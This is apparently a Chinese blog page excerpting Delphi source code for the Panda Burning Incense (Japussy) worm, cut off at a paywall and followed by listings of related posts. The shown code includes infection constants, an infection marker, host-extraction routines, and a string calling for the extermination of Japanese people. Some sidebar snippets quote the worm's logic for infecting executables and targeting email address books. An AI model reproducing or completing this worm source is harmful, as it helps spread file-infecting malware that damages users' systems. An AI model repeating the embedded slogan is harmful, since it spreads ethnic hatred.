博客摘录「 熊猫烧香病毒源代码及分析」2023年6月30日

最新推荐文章于 2024-07-16 20:47:30 发布
最新推荐文章于 2024-07-16 20:47:30 发布
阅读量434 收藏 1
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ROCKSTAR_HBD/article/details/131484545
版权
该文章描述了一个用Delphi编写的病毒程序,它能感染PE文件,篡改图标,并尝试通过邮件传播。程序会遍历磁盘,感染可执行文件,HTML和ASP文件,并可能对特定类型的文件进行破坏。此外,它还会在日文操作系统上针对特定文件类型采取行动。
摘要由CSDN通过智能技术生成 

program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432;             //病毒体的大小
IconOffset = $12EB8;           //PE文件主图标的偏移量
 
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
  
{
HeaderSize = 38912;             //Upx压缩过病毒体的大小
IconOffset = $92BC;             //Upx压缩过PE文件主图标的偏移量
 
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize   = $2E8;             //PE文件主图标的大小--744字节
IconTail   = IconOffset + IconSize; //PE文件主图标的尾部
ID       = $44444444;         //感染标记
 
//垃圾码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
        'If a country need to be destroyed, it must be Japan! ' +
        '*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; 
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si:     STARTUPINFO;
Pi:     PROCESS_INFORMATION;
IsJap:   Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
  Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
  Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
  sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  try
    dStream := TFil
最低0.47元/天 解锁文章
ROCKSTAR_HBD
关注
博客摘录「 DCDC设计以使用角度完全讲解」2023827
07-14
- **交换节点**:电感和开关的连接点,是分析电路电流流向的关键。 - **电感设计**: - **饱和电流**:电感的饱和电流必须大于电路中的最大电流。 - **温升电流**:电感的温升电流应大于电路中的平均电流。 #### ...
熊猫烧香病毒代码
2301_81967414的博客
12-28 1114
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染。if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染。if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记。else if Ext = '.ADC' then //Foxmail地址自动完成文件。else if Ext = '.WAB' then //Outlook地址簿文件。
“熊猫烧香”源码启示录
leagle
03-13 2757
随着“熊猫烧香”病毒的始作俑者的落网,关于“熊猫烧香”病毒的危害和杀毒风波告一段落,然而随着“熊猫烧香”病毒源代码在网上的流行,一种隐含的巨大的危害仿佛才刚刚开始。  一、 引言     去秋天回趟老家,适逢家中秋收后“祭宅神”。期间,听亲家二大娘在香毕吟颂的《十柱香》的佛歌,深有感触:百姓烧香祝的是神仙幸福,盼的是亲人平安—这是作为衣食百姓发自内心的心愿!但如今,正待举国上下、一家老小庆祝金猪
恶意代码分析实战 4 识别汇编中的C代码结构
农夫果园好好喝的博客
01-24 768
使用Strings进行查看,需要注意最后的这两个字符串,一个是“没有网”,另一个是“联网成功”。IDA 中查看图结构。明显是if-else结构。明显sub_401000函数决定了分界点,点进去看一看:这个函数最后返回的值就是该函数的值,似乎这个if-else 中的内容并没有影响他的返回值,在这这两个流程中都有字符串,可以大致猜测出应该是打印字符串的功能,而sub_40105F函数恰好有两个参数,而字符串恰好是第一个参数,该函数应该就是printf。该程序检查是否有一个可用的Internet连接。
【病毒分析】——熊猫烧香 && 专杀工具C源码
VI___
11-28 5187
最近忙里偷闲,将自己分析过的一些病毒记录一下,一是给刚入门的小白有个借鉴,二是不让自己写博客的习惯停下来。 一、基本信息 FileName panda.exe Type 感染型病毒 Size 30001 bytes MD5 512...
python简单的病毒编程代码,如何用python做恶搞病毒
2301_79533350的博客
12-11 2485
def take_photoes(self): while True: time.sleep(10) # 图片路径,同时带上路径+时间 photo_path = r'%s/%s.jpeg' % (self.base_dir, time.strftime('%Y-%m-%d_%H_%M_%S')) cap = None try: # VideoCapture()中第一个参数是摄像头标号,默认情况电脑自带摄像头索引为0,外置为1.2.3…然后服务器套接字继续处于监听,接收其他客户端套接字的连接请求。
博客摘录「 Anaconda安装教程(超详细版)」20231012
04-17
这篇博客摘录将详细介绍如何在Linux系统上安装Anaconda。 一、Anaconda下载 首先,你需要访问Anaconda官方网站下载适合Linux系统的安装包。通常,它提供了64位和32位两种版本,根据你的操作系统选择合适的版本。...
博客摘录「 C51里的函数指针慎用」20231210
04-04
博客摘录「 C51里的函数指针慎用」20231210
博客摘录「 linux应急响应」2024312
03-30
博客摘录「 linux应急响应」2024312
202010自考02333软件工程试题及答案.pdf
03-24
由于提供的文件信息中仅有标题、描述和部分内容摘录,没有具体的试题及答案内容,因此我无法直接从这些信息中生成具体的软件工程知识点。不过,我可以根据02333软件工程这个科目的一般性知识点,结合自考的常见题型...
熊猫烧香病毒源代码分析
WELFSDAF的博客
05-28 4861
“熊猫烧香”简介:“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。目前已有百万台电脑受害。 programJapussy; uses Windows,SysUtils,Classes,Graphics,ShellAPI{,Registry}; const HeaderS...
号称病毒之王的“熊猫烧香”详细分析
Test网络安全
09-12 1万+
01-样本概况 1.1-样本信息 基本信息 文件: C:\Users\15pb-win7\Desktop\xiongmao.exe 大小: 30001 bytes 修改时间: 2018714, 8:40:21 MD5: 512301C535C88255C9A252FDF70B7A03 SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870 CRC32: E334747C 病毒行为: 1.在系统目录下生成病毒程序
【ZMH的精品干货】恶搞的c++程序
最新发布
ZCSDNHJKS的博客
07-16 664
的意思是:让一个程序无限循环,就是你用for打开一个程序,系统会不断的打开它,知道你break它,就是将运行程序关闭,才能阻止他,system("start cmd ")是一个启动的程序,start是开始的意思,那么整个程序的意思就是:“系统,不断循环的打开cmd,直到break位置停下!的意思是:函数获取屏幕分辨率,然后srand就是随机函数,也就是让鼠标在屏幕上随机出现,while(1)也是不断循环的意思,如果你启动了这个程序,那恭喜你,你可以关机重启了!top1 不停打开的cmd(磁盘操作系统)
面试必备资料,“熊猫烧香”病毒的原,看完老板就给加薪了
2401_84003839的博客
04-08 1148
为了方便有学习需要的朋友,我把资料都整理成了视频教程(实际上比预期多花了不少精力)当程序员容易,当一个优秀的程序员是需要不断学习的,从初级程序员到高级程序员,从初级架构师到资深架构师,或者走向管理,从技术经理到技术总监,每个阶段都需要掌握不同的能力。早早确定自己的职业方向,才能在工作和能力提升中甩开同龄人。无论你现在水平怎么样一定要 持续学习 没有鸡汤,别人看起来的毫不费力,其实费了很大力,这四个字就是我的建议!!我希望每一个努力生活的IT工程师,都会得到自己想要的,因为我们很辛苦,我们应得的。
恶意代码浅析
Reveone的博客
09-20 717
恶意代码的种类非常多,不仅仅是EXE可执行程序中可以携带恶意代码,office文档和脚本程序也可以携带恶意代码。对于恶意程序的分析,大体上和普通程序的分析方式一致。本文主要介绍各类型恶意代码的分析方法和一些经典的恶意代码分析实践。
经典病毒:熊猫烧香函数全分析
m0_52164435的博客
04-17 905
熊猫烧香病毒分析
熊猫烧香C语言源代码,熊猫烧香病毒源代码 1.0 完整版 (图文)
热门推荐
weixin_28885791的博客
05-22 1万+
“熊猫烧香”是一种可经过多次变种的蠕虫病毒变种形态,新云软件园提供熊猫烧香病毒源代码下载,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。源码分析大体的看了下,主要是通过拷贝...
爱虫病毒源代码分析
Manio
11-02 1万+
!--这是爱虫病毒的源代码,爱虫病毒通过邮件传播,但是只局限于outlook的用户,病毒作者通过邮件的内容引诱收件人打开邮件的附件。而事实上,附件是一个.vbs的vbscript脚本程序,当用户打开这个文件时,病毒找到计算机上的所有邮件地址,并把自己作为附件粘到附件里并发送出去。而且会把自己得复制到系统目录中,而且会修改注册表,做系统在启动时运行病毒代码。 -->HTML>HEAD>Title
C++经典实例与源代码大全
读者可以通过阅读和分析这些源代码,提升自己的编码技能,并逐渐熟悉C++编程的常见问题解决策略。 值得注意的是,该书受到版权保护,未经许可,不得进行任何形式的复制或存储,除非是在进行学术引用时进行短篇摘录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值